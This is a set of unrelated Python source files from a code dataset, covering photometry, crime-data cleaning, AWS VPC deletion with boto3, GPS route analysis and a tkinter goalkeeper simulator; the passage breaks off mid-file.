{\n u'@id': u'http://nohost/plone/ordnungssystem/rechnungsprufungskommission',\n u'@type': u'opengever.repository.repositoryfolder',\n u'description': u'',\n u'review_state': u'repositoryfolder-state-active',\n u'title': None,\n },\n {\n u'@id': u'http://nohost/plone/ordnungssystem/spinnannetzregistrar',\n u'@type': u'opengever.repository.repositoryfolder',\n u'description': u'',\n u'review_state': u'repositoryfolder-state-inactive',\n u'title': None,\n },\n ],\n u'items_total': 3,\n u'layout': u'tabbed_view',\n u'modified': u'2016-08-31T07:11:33+00:00',\n u'parent': {\n u'@id': u'http://nohost/plone',\n u'@type': u'Plone Site',\n u'description': u'',\n u'title': u'Plone site',\n },\n u'relative_path': u'ordnungssystem',\n u'review_state': u'repositoryroot-state-active',\n u'title_de': u'Ordnungssystem',\n u'title_fr': u'Syst\\xe8me de classement',\n u'valid_from': None,\n u'valid_until': None,\n u'version': None,\n }\n self.assert_json_structure_equal(expected_repository_root, browser.json)\n","sub_path":"opengever/api/tests/test_repository.py","file_name":"test_repository.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"239148455","text":"def calc_price(values):\n assert type(values) == list\n if len(values) > 0:\n assert 0 <= min(values) and max(values) <= 100 * 10000\n return int(sum(values) * 1.10 + 0.5)\n\n\nif __name__ == '__main__':\n while True:\n try:\n values = list(map(int, input().split(',')))\n print(calc_price(values))\n except EOFError:\n break","sub_path":"tax.py","file_name":"tax.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"44290528","text":"import sys\n\nimport pandas as pd\nimport datetime\n\nfrom matplotlib import ticker\nfrom shapely.geometry import Point\nimport matplotlib.pyplot as plt\n\npoints = [(50.52941, 14.0719), (50.52927, 14.0722)]\n\ndef toCartesian(latitude, longitude):\n x = longitude * 70_800\n y = latitude * 111_300\n return Point(x, y)\n\n\ndef get_path(pathdata, starttime, endtime):\n return pathdata[(starttime <= pathdata[\"timestamp_m\"]) & (pathdata[\"timestamp_m\"] <= endtime)]\n\n\ndef minimal_distance(path, lat, long):\n p = toCartesian(lat, long)\n minimal = path.apply(lambda x: toCartesian(x[\"locLat\"], x[\"locLon\"]).distance(p),\n axis=1)\n return minimal.min(), minimal.idxmin()\n\nroutes = pd.read_csv(\"data/localized_routes_01.csv\")\npathdata = pd.read_csv(\"data/01_2021-02-25.csv\",\n index_col=\"beat\",\n converters={\n \"beat\": lambda x: int(float(x)),\n \"timestamp_m\": lambda x: int(float(x))})\npathdata2 = pd.read_csv(\"data/01_2021-03-16.csv\",\n index_col=\"beat\",\n converters={\n \"beat\": lambda x: int(float(x)),\n \"timestamp_m\": lambda x: int(float(x))})\npathdata = pathdata.append(pathdata2)\nroutes[\"date\"] = pd.to_datetime(routes[\"beat\"], unit=\"s\")\nroutes = routes[(datetime.datetime(2021,2,25) <= routes[\"date\"])\n & (routes[\"date\"] <= datetime.datetime(2021,2,26))\n |\n (datetime.datetime(2021, 3, 16) <= routes[\"date\"])\n & (routes[\"date\"] <= datetime.datetime(2021, 3, 17))]\nprint(routes)\n\np1_dist = []\np2_dist = []\nstart_beat = []\np1_beat = []\np2_beat = []\nend_beat = []\nt1_longs = []\nt1_lats = []\nt1_plongs = []\nt1_plats = []\nt2_longs = []\nt2_lats = []\nt2_plongs = []\nt2_plats = []\nt3_longs = []\nt3_lats = []\nt3_plongs = []\nt3_plats = []\nresults = []\n\n\nfor index, route in routes.iterrows():\n starttime = route[\"beat\"]\n endtime = route[\"end_beat\"]\n path = get_path(pathdata, starttime * 1000, endtime * 1000)\n if len(path) == 0:\n continue\n start_beat.append(path.index[0])\n end_beat.append(path.index[-1])\n dist1, idx1 = minimal_distance(path, *points[0])\n p1_dist.append(dist1)\n p1_beat.append(idx1)\n dist2, idx2 = minimal_distance(path, *points[1])\n p2_dist.append(dist2)\n p2_beat.append(idx2)\n if dist1 < 7.0:\n if route[\"locLon_end\"] > 14.0726 and route[\"locLat_end\"] > 50.5291:\n t1_plats.extend(path[\"locLat\"])\n t1_plongs.extend(path[\"locLon\"])\n t1_lats.append(route[\"locLat_end\"])\n t1_longs.append(route[\"locLon_end\"])\n results.append(0)\n elif route[\"locLon_end\"] > 14.07265:\n t3_plats.extend(path[\"locLat\"])\n t3_plongs.extend(path[\"locLon\"])\n t3_lats.append(route[\"locLat_end\"])\n t3_longs.append(route[\"locLon_end\"])\n results.append(2)\n else:\n t2_plats.extend(path[\"locLat\"])\n t2_plongs.extend(path[\"locLon\"])\n t2_lats.append(route[\"locLat_end\"])\n t2_longs.append(route[\"locLon_end\"])\n results.append(1)\n else:\n results.append(-1)\n\nplt.scatter(t2_plongs, t2_plats, c=\"#9999FF\", s=1)\nplt.scatter(t1_plongs, t1_plats, c=\"#99FF99\", s=1)\nplt.scatter(t3_plongs, t3_plats, c=\"#FF9999\", s=1)\nplt.scatter(t1_longs, t1_lats, c=\"#00AA00\")\nplt.scatter(t2_longs, t2_lats, c=\"#0000AA\")\nplt.scatter(t3_longs, t3_lats, c=\"#AA0000\")\nplt.scatter([points[0][1]], [points[0][0]], s=5, c=\"k\")\n#plt.scatter([points[1][1]], [points[1][0]], c=\"r\")\nplt.gca().xaxis.set_minor_locator(ticker.MultipleLocator(0.0001))\nplt.gca().yaxis.set_minor_locator(ticker.MultipleLocator(0.0001))\nplt.grid(True, which=\"both\")\nplt.show()\nroutes[\"p1_minimal_dist\"] = p1_dist\nroutes[\"p2_minimal_dist\"] = p2_dist\nroutes[\"start_pbeat\"] = start_beat\nroutes[\"p1_pbeat\"] = p1_beat\nroutes[\"p2_pbeat\"] = p2_beat\nroutes[\"end_pbeat\"] = end_beat\nroutes[\"target\"] = results\n\nroutes.to_csv(\"data/routes_pdist_brezen_01.csv\")\n","sub_path":"lastmeters.py","file_name":"lastmeters.py","file_ext":"py","file_size_in_byte":4087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"271777004","text":"#!/usr/bin/python3\nimport boto3\nimport argparse\n\n# defining resources\nec2 = boto3.resource('ec2')\nclient = boto3.client('ec2')\n\nvpc_id = client.describe_vpcs()['Vpcs'][0]['VpcId']\nvpc = ec2.Vpc(vpc_id)\n\nif len(client.describe_internet_gateways()['InternetGateways']) > 0:\n vpc_id = client.describe_internet_gateways()['InternetGateways'][0]['Attachments'][0]['VpcId']\n internet_gateway_id = client.describe_internet_gateways()['InternetGateways'][0]['InternetGatewayId']\n vpc = ec2.Vpc(vpc_id)\n vpc.detach_internet_gateway(InternetGatewayId=internet_gateway_id)\n client.delete_internet_gateway(InternetGatewayId=internet_gateway_id)\n\nclient.delete_vpc(VpcId=vpc_id)\ndhcp_options_id = client.describe_dhcp_options()['DhcpOptions'][0]['DhcpOptionsId']\nclient.delete_dhcp_options(DhcpOptionsId=dhcp_options_id)\n","sub_path":"boto3/session1/ariel_way/delete_vpc.py","file_name":"delete_vpc.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"651899018","text":"#!/usr/bin/env python\nfrom photutils import centroid_com, centroid_1dg, centroid_2dg\nfrom photutils import CircularAperture\nfrom photutils import CircularAnnulus\nfrom photutils import aperture_photometry\nimport numpy as np\nfrom tqdm import tqdm\ntry:\n from astropy.io import fits\nexcept:\n import pyfits as fits\nfrom datetime import datetime as dt\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom scipy.optimize import curve_fit\n\nfrom photutils import DAOStarFinder\nfrom astropy.stats import sigma_clipped_stats\nfrom astropy.visualization import ZScaleInterval\n\ndef get_sources(img, num_stars=10, fwhm=8.0):\n mean, median, std = sigma_clipped_stats(img, sigma=3.0, iters=5)\n daofind = DAOStarFinder(fwhm=fwhm, threshold=5.*std)\n sources = daofind(img - median)\n #convert to pandas dataframe for easy sorting\n sources = sources.to_pandas()\n #sort by brightness\n sources = sources.sort_values(by='peak',ascending=False)\n\n return sources.head(num_stars)\n\ndef show_sources(image, sources, num_stars=10):\n '''\n similar to `show_peaks`; difference is `sources` used as input\n '''\n positions = (sources['xcentroid'].values[:num_stars], sources['ycentroid'].values[:num_stars])\n apertures = CircularAperture(positions, r=20.)\n vmin,vmax= ZScaleInterval().get_limits(image)\n plt.figure(figsize=(10,10))\n plt.imshow(image, origin='lower', vmin=vmin,vmax=vmax)\n for num, (x,y) in enumerate(zip(positions[0],positions[1])):\n plt.text(x+5,y+5, num+1, fontsize=20, color='w')\n\n apertures.plot(color='r', lw=2)\n #return None\n plt.show()\n\ndef get_crop(image, centroid, box_size):\n x, y = centroid\n image_crop = np.copy(image[int(y-(box_size/2)):int(y+(box_size/2)),int(x-(box_size/2)):int(x+(box_size/2))])\n\n return image_crop\n\ndef get_centroid(image, method='com'):\n '''\n centroid_com(): Calculates the object “center of mass” from 2D image moments.\n centroid_1dg(): Calculates the centroid by fitting 1D Gaussians to the marginal x and y distributions of the data.\n centroid_2dg(): Calculates the centroid by fitting a 2D Gaussian to the 2D distribution of the data.\n Default is com.\n '''\n if method=='com':\n x, y = centroid_com(image)\n return (x,y)\n\n elif method=='1d_gaussian':\n x, y = centroid_1dg(image)\n return (x,y)\n elif method=='2d_gaussian':\n #bug: takes too much time; fit may be unsuccessful\n x, y = centroid_2dg(image)\n return (x,y)\n else:\n print('invalid centroiding algorithm')\n sys.exit()\n\n\ndef get_phot(image, centroid, r, fwhm = 8.0):\n\n apertures = CircularAperture(centroid, r)\n phot_table = aperture_photometry(image, apertures)\n\n #xcenter = phot_table['xcenter']\n #ycenter = phot_table['ycenter']\n #centroid = (xcenter, ycenter)\n aperture_sum = float(phot_table['aperture_sum'])\n\n return aperture_sum #,centroid\n\ndef get_phot2(image, bkg_mean, centroid, r=10):\n\n apertures = CircularAperture(centroid, r)\n phot_table = aperture_photometry(image - bkg_mean, apertures)\n aperture_sum = float(phot_table['aperture_sum'])\n\n return aperture_sum #,centroid\n\ndef get_multiple_phot(image, centroid, aperture_radii):\n '''\n bug: Cannot convert a table with mixin columns to a pandas DataFrame\n '''\n apertures = [CircularAperture(centroid, r=r) for r in aperture_radii]\n phot_table = aperture_photometry(image, apertures)\n #convert to pandas dataframe\n #phot_table = phot_table.to_pandas()\n return phot_table\n\ndef sigma_per_r(image, centroid, r_in, r_out, delta_r,show_image=True):\n r = np.arange(r_in,r_out,delta_r)\n aperture_sums = []\n for i in r:\n aperture_sums.append(get_phot(image, centroid, r=i))\n if show_image==True:\n plt.plot(r,aperture_sums,'o')\n plt.xlabel('aperture radius')\n plt.ylabel('aperture sum')\n return aperture_sums\n\ndef radial_profile(image, center):\n y, x = np.indices((image.shape))\n r = np.sqrt((x - center[0])**2 + (y - center[1])**2)\n r = r.astype(np.int)\n\n tbin = np.bincount(r.ravel(), image.ravel())\n nr = np.bincount(r.ravel())\n radialprofile = tbin / nr\n return radialprofile\n\ndef get_bkg(image, centroid, r_in=10., r_out=20.):\n annulus = CircularAnnulus(centroid, r_in, r_out)\n result = aperture_photometry(image, annulus)\n bkg_mean = float(result['aperture_sum'] / annulus.area())\n return bkg_mean\n\ndfs = []\ndef make_lightcurve(centroids, bands, band_idx, box_size, aperture_radius):\n \"\"\"Creates a lightcurve after doing aperture photometry\n\n Parameters\n ----------\n\n centroids : typle\n (x,y) centroid positions from config.txt\n\n bands: dict\n dictionary of filenames by band/color\n\n band_idx: int\n index for band/color\n\n box_size: int\n size of box for cropping (in pix)\n\n aperture_radius: int\n aperture radius for photometry (in pix)\n \"\"\"\n band_names = np.sort(list(bands.keys()))\n num_stars= range(len(centroids))\n for star_idx in num_stars:\n xcenters, ycenters = [],[]\n aperture_sums = []\n background = []\n fwhms = []\n obs_time = []\n obs_mjd = []\n ##extract lightcurve (enumerate all frames) in a given band\n for i in tqdm(bands[band_names[band_idx]]):\n #import pdb; pdb.set_trace()\n hdr = fits.open(i)[0].header\n img = fits.open(i)[0].data\n #get dates from fits header\n date=dt.strptime(hdr['DATE-OBS'], '%Y-%m-%d')\n time=dt.strptime(hdr['EXP-STRT'], '%H:%M:%S.%f')\n newdate = time.replace(year=date.year, month=date.month, day=date.day)\n obs_time.append(newdate)\n obs_mjd.append(hdr['MJD-STRT'])\n\n #crop\n #import pdb; pdb.set_trace()\n image_crop = get_crop(img, centroids[star_idx], box_size)\n\n ###aperture photometry###\n #compute centroid\n centroid = get_centroid(image_crop)\n\n xcenters.append(centroid[0])\n ycenters.append(centroid[1])\n\n #compute backgound\n bkg_mean=get_bkg(image_crop, centroid, r_in=20., r_out=30.)\n\n #measure fwhm\n fwhm=get_fwhm(image_crop)\n\n #without aperture photometry\n\n aperture_sum = get_phot(image_crop, centroid, r=aperture_radius)\n\n #minus background wihtin annulus\n #aperture_sum = get_phot2(image_crop,bkg_mean,centroid,r=aperture_radius)\n\n aperture_sums.append(aperture_sum)\n background.append(bkg_mean)\n\n # if fwhm < 10*np.median(fwhms):\n # fwhms.append(fwhm)\n # else:\n # fwhms.append(np.nan)\n fwhms.append(fwhm)\n\n #output as dataframe of given band and star\n\n dfs.append(pd.DataFrame(\n {'{0}_{1}_x'.format(band_names[band_idx], str(star_idx)) : xcenters,\n '{0}_{1}_y'.format(band_names[band_idx], str(star_idx)) : ycenters,\n '{0}_{1}_flux_r{2}'.format(band_names[band_idx], str(star_idx), aperture_radius) : aperture_sums,\n '{0}_{1}_bkg_r{2}'.format(band_names[band_idx], str(star_idx), aperture_radius) : background,\n '{0}_{1}_fwhm_r{2}'.format(band_names[band_idx], str(star_idx), aperture_radius) : fwhms},\n #'airmass' : airmass\n index = obs_time))\n return dfs, band_idx, band_names\n\ndef get_fwhm(image_crop):\n # https://python4astronomers.github.io/fitting/sherpa.html\n i,j = np.unravel_index(image_crop.argmax(), image_crop.shape) #take x,y max\n #plt.plot(image_crop[i,:], '-')\n #plt.plot(image_crop[:,j], '--')\n peak_x=image_crop[i,:]\n peak_y=image_crop[:,j]\n try:\n sigma=model_gaussian(peak_x, peak_y)\n fwhm=2.355*np.abs(sigma)\n except:\n #no good estimate\n fwhm=np.nan\n\n return fwhm\n\ndef gauss(x, *params):\n A, mu, sigma, eps= params\n return A*np.exp(-(x-mu)**2/(2.*sigma**2)) + eps\n\ndef model_gaussian(peak_x, peak_y,verbose=False):\n #estimate mean and standard deviation\n ydata = (peak_x+peak_y)/2.0\n xdata = np.array(range(len(ydata)))\n xmean = len(xdata)\n sigma = np.std(ydata)\n amp = np.max(ydata)\n eps =0.1\n #fitting\n popt, pcov = curve_fit(gauss, xdata, ydata, p0 = [amp, xmean, sigma, eps])\n\n #plt.plot(xdata,gauss(xdata, *popt), label='Gaussian fit')\n #plt.plot(xdata,ydata,'ok', label='data')\n #plt.legend()\n if verbose==True:\n print('A: {}\\nmu: {}\\nsigma= {}\\neps: {}'.format(popt[0],popt[1], popt[2], popt[3]))\n return popt[2]\n","sub_path":"moscatel/phot.py","file_name":"phot.py","file_ext":"py","file_size_in_byte":8697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"356956347","text":"def compare(current_data_times,current_data_tags,db_data):\r\n#inputs: current_data_times- list of the repititions of the HTML tags of input website\r\n#current_data_tags-list of the HTML tags of input website\r\n#db_data- type list. A table of expected elements and repititions, taken from DB.\r\n#purpose: compares between table from DB to input lists and prints the differences\r\n for line in db_data:\r\n flag=0\r\n ind=0\r\n for tag in current_data_tags:\r\n temp=line[1].split()[0] #clear spaces\r\n if temp==tag:\r\n flag=1\r\n print(str(temp) + \" expected \" + str(line[0]) + \" found \" + str(current_data_times[ind]))\r\n break\r\n ind += 1\r\n if flag==0:\r\n print(str(temp[0])+\" expected \"+str(line[0])+\" found \"+\"0\")\r\n\r\n\r\n\r\n","sub_path":"compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"539075589","text":"'''\nPurpose:\n Clean crime dataframe with nearest node information for each\n community area.\n'''\nimport numpy as np\nimport pandas as pd\nimport osmnx as ox\nfrom matplotlib import pyplot as plt\n\npd.options.mode.chained_assignment = None # default='warn'\n\n\ndef get_com_dict(data, com_Gs, community_areas, plot=False):\n '''\n Purpose:\n Construct crime dataframe for each community area. We\n cleaned dataframe to have additional information such\n as nearest node, hour, month, time of day, season. Can\n also generate plots for relevant information for each\n community area.\n Inputs:\n data (Pandas DataFrame): crime data imported from Chicago Data Portal\n com_Gs (dictionary): maps community area to boundary geodataframe.\n community_areas (dictionary): maps community area to community\n code number\n plot (boolean): if True, plot stats, otherwise don't plot\n Outputs:\n com_df (dictionary): creates a dictionary with key as community area\n with crime dataframe\n (ex) com_df = {'HYDE PARK': hyde_park_df, 'DOUGLAS': douglas_df, etc.}\n '''\n com_dict = {}\n seasons_months = {\n 'winter': [12, 1, 2],\n 'spring': [3, 4, 5],\n 'summer': [6, 7, 8],\n 'fall': [9, 10, 11]}\n time_of_day_hours = {\n 'morning': [1, 2, 3, 4, 5, 6, 7, 8],\n 'night': [0, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19,\\\n 20, 21, 22, 23]}\n\n for com in community_areas:\n # specific community crimes\n com_crime = data[data['community_area'] == community_areas[com]]\n G = com_Gs[com]\n # Finds the nearest node id:\n com_crime['nearest_node'] = ox.get_nearest_nodes(G,\\\n np.array(com_crime['longitude']), np.array(\\\n com_crime['latitude']), method='kdtree')\n com_crime.drop(columns=['latitude', 'longitude'], inplace=True)\n com_crime['hour'] = com_crime['date'].dt.hour\n com_crime['month'] = com_crime['date'].dt.month\n com_crime['time_of_day'] = np.nan #Fill in values as NaN\n com_crime['season'] = np.nan #Fill in values as NaN\n\n # Following lines of code motivated by:\n # https://stackoverflow.com/questions/16327055/how-to-add-\n # an-empty-column-to-a-dataframe\n for time_of_day, hours in time_of_day_hours.items():\n com_crime.loc[com_crime['hour'].\\\n isin(hours), 'time_of_day'] = time_of_day\n for season, months in seasons_months.items():\n com_crime.loc[com_crime['month'].\\\n isin(months), 'season'] = season\n\n if plot:\n graph_by_time(com_crime, com)\n graph_by_month(com_crime, com)\n graph_by_season(com_crime, com)\n else:\n com_crime = com_crime.drop(columns=['hour', 'month'])\n # If plotting, need these columns to make graphs for\n # entirety of Chicago\n\n com_dict[com] = com_crime\n\n if plot: # Generate graphs for entirety of Chicago\n com_df_merged = pd.concat([com for com in com_dict.values()], axis=0)\n graph_by_time(com_df_merged, 'CHICAGO')\n graph_by_month(com_df_merged, 'CHICAGO')\n graph_by_season(com_df_merged, 'CHICAGO')\n for com, com_crime in com_dict.items():\n com_dict[com] = com_crime.drop(columns=['hour', 'month'])\n\n return com_dict\n\n\ndef graph_by_time(com_crime_df, com_area):\n '''\n Constructs crime frequency over different hours\n '''\n vals = com_crime_df['hour'].value_counts()\n plt.bar(x=vals.index, height=vals)\n plt.xlabel('Time of Day (Hour)')\n plt.ylabel('Total Number of Crimes')\n plt.title('Crime Counts by Time of Day for ' + com_area.title())\n filename = 'data/folium_figures/' + com_area.replace(' ', '_') + '_time.png'\n plt.savefig(filename, bbox_inches='tight')\n plt.clf()\n\n\ndef graph_by_month(com_crime_df, com_area):\n '''\n Constructs crime frequency over different months\n '''\n vals = com_crime_df['month'].value_counts()\n plt.bar(x=vals.index, height=vals)\n plt.xlabel('Month')\n plt.ylabel('Total Number of Crimes')\n plt.title('Crime Counts by Month for ' + com_area.title())\n filename = 'data/folium_figures/' + com_area.replace(' ', '_') + '_month.png'\n plt.savefig(filename, bbox_inches='tight')\n plt.clf()\n\n\ndef graph_by_season(com_crime_df, com_area):\n '''\n Constructs crime frequency over different seasons\n '''\n vals = com_crime_df['season'].value_counts()\n plt.bar(x=vals.index, height=vals)\n plt.xlabel('Season')\n plt.ylabel('Total Number of Crimes')\n plt.title('Crime Counts by Season for ' + com_area.title())\n filename = 'data/folium_figures/' + com_area.replace(' ', '_') + '_season.png'\n plt.savefig(filename, bbox_inches='tight')\n plt.clf()\n","sub_path":"code/cleaned_dataset_crime.py","file_name":"cleaned_dataset_crime.py","file_ext":"py","file_size_in_byte":4844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"337956269","text":"from tkinter import *\r\nimport shelvE\r\nimport time\r\nimport win32api as win32\r\nimport win32con\r\nimport os\r\nfrom PIL import ImageGrab\r\n\r\n\r\ntutorial = \"\"\"CALIBRAGEM DE TRAVE\\n\r\n 1. Marque a opção \"Ball\" antes de começar\\n\r\n 2. Colocar a bola no chão ao meio da trave e colocar a câmera centralizada, fazendo com que xReal = 0 e yReal = 0\\n\r\n 3. Colocar a bola em frente a trave da esquerda e direita, verificar o valor do xReal no simulador, adicionar os mesmos nos campos adequados\\n\r\n 4. Colocar a bola em frente a trave superior, verificar o valor yReal e adicionar ao campo adequado\\n\r\n 5. Caso ainda falte um pouco para chegar ao ponto correto, adicione ou tire valores baixos (Exemplo: xReal - 10) ao xReal ou yReal, até que ele se encaixe corretamente nas posições desejadas\\n\r\n \"\"\"\r\n\r\ntutorial_verificacao = True\r\ncontPrints = 0\r\n\r\nclass App(object):\r\n def __init__(self):\r\n \"\"\"Classe de criação da aplicação, frames e atributos ( Botoes, campos, textos, checkbuttons ... )\"\"\"\r\n\r\n self.root = Tk()\r\n self.root.title('Goalkeeper Simulator')\r\n #self.root.geometry('700x700')\r\n self.root.resizable(False, False)\r\n self.angulo = 0\r\n\r\n #Cores\r\n self.corGoleiro = '#e2c498'\r\n self.corRede = '#6b6b6b'\r\n self.corBola = '#e26f4f'\r\n\r\n self.xReal = 0\r\n self.yReal = 0\r\n self.x = 0\r\n self.y = 0\r\n self.raio = 0\r\n self.raioDefesa = 60\r\n\r\n #TAMANHO DO SIMULADOR <<<<<<<<<<<<<<<<<<<<<<<<<<< #PADRAO 200x200\r\n self.heightCanvas = 400\r\n self.widthCanvas = 400\r\n self.tamanhoBola = (5*self.heightCanvas) / 200\r\n\r\n #IMPORTANTE <<<<< É O TAMANHO DA TRAVE NA WEBCAM (600x450 PEGA A WEBCAM TODA COMO REFERENCIA)\r\n self.xTotalGol = 600\r\n self.yTotalGol = 450\r\n\r\n #Frame\r\n self.frameGoleiro = Frame(self.root)\r\n self.frameGoleiro.pack()\r\n self.frame1 = Frame(self.root)\r\n self.frame1.pack(side='top')\r\n self.frame2 = Frame(self.root)\r\n self.frame2.pack(side='top')\r\n self.frame3 = Frame(self.root)\r\n self.frame3.pack(side='top')\r\n self.frame4 = Frame(self.root)\r\n self.frame4.pack(side='top', padx=5, pady=10)\r\n\r\n #Canvas\r\n self.canvas = Canvas(self.frameGoleiro, bg='grey', height=self.heightCanvas, width=self.widthCanvas)\r\n self.canvas.pack()\r\n self.escala = self.heightCanvas/200\r\n\r\n #Atributos\r\n #BotaoOn\r\n self.botaoOn = Button(self.frame1, text='On', width=10, bg='#bababa', command=self.comecar)\r\n self.rodando = False\r\n self.botaoOn.pack(pady=10, padx=10, side='left')\r\n #BotaoReset\r\n self.botaoReset = Button(self.frame1, text='Reset', width=10, bg='#bababa', command=self.resetar)\r\n self.botaoReset.pack(side='left')\r\n #BotaoCalibrar\r\n self.botaoCalibrar = Button(self.frame1, text='Calibrar', width=10, bg='#bababa', command=self.calibrar)\r\n self.botaoCalibrar.pack(side='left', padx=10)\r\n #BotaoConfigurarCorBola\r\n self.botaoCor = Button(self.frame1, text='Cor Bola', width=10, bg='#bababa', command=self.calibrarCorBola)\r\n self.botaoCor.pack(side='left')\r\n #CheckButton Bola ligada\r\n self.bolaLigada = False\r\n self.checkbutton = Checkbutton(self.frame1, text='Ball', command=self.habilitarBola)\r\n self.checkbutton.pack(padx=10, pady=10, side='top')\r\n #Entradas de calibragem\r\n self.tituloEsquerda = Label(self.frame2, text='xReal Esquerda:')\r\n self.tituloEsquerda.pack(side='left')\r\n self.xCalibrarTraveEsquerda = Entry(self.frame2, width=5)\r\n self.xCalibrarTraveEsquerda.pack(pady=5, side='left', padx=10)\r\n self.tituloDireita = Label(self.frame2, text='xReal Direita:')\r\n self.tituloDireita.pack(side='left')\r\n self.xCalibrarTraveDireita = Entry(self.frame2, width=5)\r\n self.xCalibrarTraveDireita.pack(pady=5, side='left', padx=10)\r\n self.tituloAltura = Label(self.frame2, text='Altura (0 ~ 450):')\r\n self.tituloAltura.pack(side='left')\r\n self.yCalibrarTraveAltura = Entry(self.frame2, width=5)\r\n self.yCalibrarTraveAltura.pack(pady=5, side='top', padx=10)\r\n #Entrada do raio de defesa\r\n self.tituloRaio = Label(self.frame3, text='Raio de defesa (Padrão 60):')\r\n self.tituloRaio.pack(side='left', pady=5, padx=10)\r\n self.CamporaioDefesa = Entry(self.frame3, width=5)\r\n self.CamporaioDefesa.pack(side='left')\r\n self.botaoRaio = Button(self.frame3, text='Enter Raio', bg='#bababa', command=self.validarRaio)\r\n self.botaoRaio.pack(pady=5, padx=10, side='left')\r\n #CheckButton p/ porta serial\r\n self.serialLigada = False\r\n self.checkbuttonSerial = Checkbutton(self.frame3, text='Send in Serial', variable=self.serialLigada, command=self.sendSerial)\r\n self.checkbuttonSerial.pack(side='left')\r\n #Botão p/ abrir o software de reconhecimento\r\n self.botaoOpenSoftware = Button(self.frame4, text='Abrir Software de reconhecimento', bg='#bababa', command=self.abrirSoftwareReconhecimento)\r\n self.botaoOpenSoftware.pack(side='left', padx=10)\r\n #Botão PauseOnGoal\r\n self.pausarNoGolLigado = False\r\n self.botaoPauseOnGoal = Button(self.frame4, text='Printscreen: Off', bg='#d32c2c', command=self.printScreenOnGoal)\r\n self.botaoPauseOnGoal.pack()\r\n\r\n\r\n #Inicio do simulador\r\n self.criarSimulador()\r\n self.root.mainloop()\r\n\r\n def criarSimulador(self):\r\n \"\"\"Criar os elementos principais do canvas no simulador\"\"\"\r\n #Trave\r\n self.canvas.create_rectangle((3*self.escala, 80*self.escala), (200*self.escala, 210*self.escala), fill='white', tag='trave')\r\n self.canvas.create_rectangle((9*self.escala, 86*self.escala), (192*self.escala, 210*self.escala), fill='black', tag='trave')\r\n self.canvas.create_polygon((24*self.escala, 95*self.escala), (180*self.escala, 95*self.escala), (180*self.escala, 210*self.escala), (24*self.escala, 210*self.escala), outline='white', width=2, tag='trave')\r\n self.canvas.create_line((3*self.escala, 80*self.escala), (24*self.escala, 95*self.escala), fill='white', width=3, tag='trave')\r\n self.canvas.create_line((196*self.escala, 83*self.escala), (180*self.escala, 95*self.escala), fill='white', width=3, tag='trave')\r\n\r\n horizontal = 18\r\n vertical = 89\r\n\r\n #Rede\r\n for i in range(20):\r\n self.canvas.create_line((horizontal*self.escala, 95*self.escala), (horizontal*self.escala, 210*self.escala), fill=self.corRede, width=1, tag='trave')\r\n self.canvas.create_line((5*self.escala, vertical*self.escala), (200*self.escala, vertical*self.escala), fill=self.corRede, width=1, tag='trave')\r\n vertical += 10\r\n horizontal += 10\r\n\r\n p1 = 10*self.escala\r\n p2 = 30*self.escala\r\n\r\n for i in range(18):\r\n self.canvas.create_line((p1*self.escala, 80*self.escala), (p2*self.escala, 95*self.escala), fill=self.corRede, width=1, tag='trave')\r\n self.canvas.create_line((24*self.escala, vertical*self.escala), (180*self.escala, vertical*self.escala), fill=self.corRede, width=1, tag='trave')\r\n p1 += 10*self.escala\r\n p2 += 10*self.escala\r\n\r\n #Grama\r\n self.canvas.create_rectangle((88*self.escala, 180*self.escala), (110*self.escala, 205*self.escala), fill='#707070', outline='black')\r\n self.canvas.create_line((0*self.escala, 200*self.escala), (250*self.escala, 200*self.escala), fill='green', width=(5*self.heightCanvas) / 200)\r\n\r\n #Textos\r\n self.canvas.create_text((35*self.escala, 70*self.escala), text='Trave', fill='white', font=('Verdana', 10, 'bold'))\r\n self.canvas.create_text((60*self.escala, 10*self.escala), text='xReal: {}'.format(self.xReal), fill='white', font=('Verdana', 10, 'bold'), tag='xreal')\r\n self.canvas.create_text((60*self.escala, 30*self.escala), text='yReal: {}'.format(self.yReal), fill='white', font=('Verdana', 10, 'bold'), tag='yreal')\r\n\r\n self.canvas.create_text((140*self.escala, 10*self.escala), text='x: {}'.format(self.x), fill='white', font=('Verdana', 10, 'bold'), tag='x')\r\n self.canvas.create_text((140*self.escala, 30*self.escala), text='y: {}'.format(self.y), fill='white', font=('Verdana', 10, 'bold'), tag='y')\r\n self.canvas.create_text((100*self.escala, 60*self.escala), text='Raio: {}'.format(self.raio), fill='white',font=('Verdana', 10, 'bold'), tag='raio')\r\n\r\n #Goleiro\r\n self.angulo=90\r\n self.goleiro = self.canvas.create_arc((7*self.escala, 75*self.escala), (190*self.escala, 300*self.escala), start=-(170 + (self.angulo + 1)), extent=-20, fill=self.corGoleiro, tag='goleiro')\r\n self.texto = self.canvas.create_text((150*self.escala, 70*self.escala), text='Goleiro: {}º'.format(self.angulo), fill='white', font=('Verdana', 10, 'bold'), tag='textoangulo')\r\n\r\n def calibrarCorBola(self):\r\n \"\"\" Vai abrir o range-detector.py para poder calibrar a cor da bola\r\n o script precisa estar no mesmo diretorio deste programa \"\"\"\r\n\r\n path = os.path.abspath(\"\") + '\\\\range-detector.py'\r\n os.system(f'py {path} -f HSV -w')\r\n\r\n\r\n def abrirSoftwareReconhecimento(self):\r\n \"\"\" Vai abrir o software com o 'os', o script precisa estar no mesmo diretorio deste programa ... (goalkeeper.py) \"\"\"\r\n\r\n #path = os.path.abspath(\"\") + '\\\\goalkeeper.py'\r\n #os.system(f'py {path}')\r\n win32.WinExec('goalkeeper.bat', win32con.SW_HIDE)\r\n\r\n def printScreenOnGoal(self):\r\n self.pausarNoGolLigado = not self.pausarNoGolLigado\r\n if 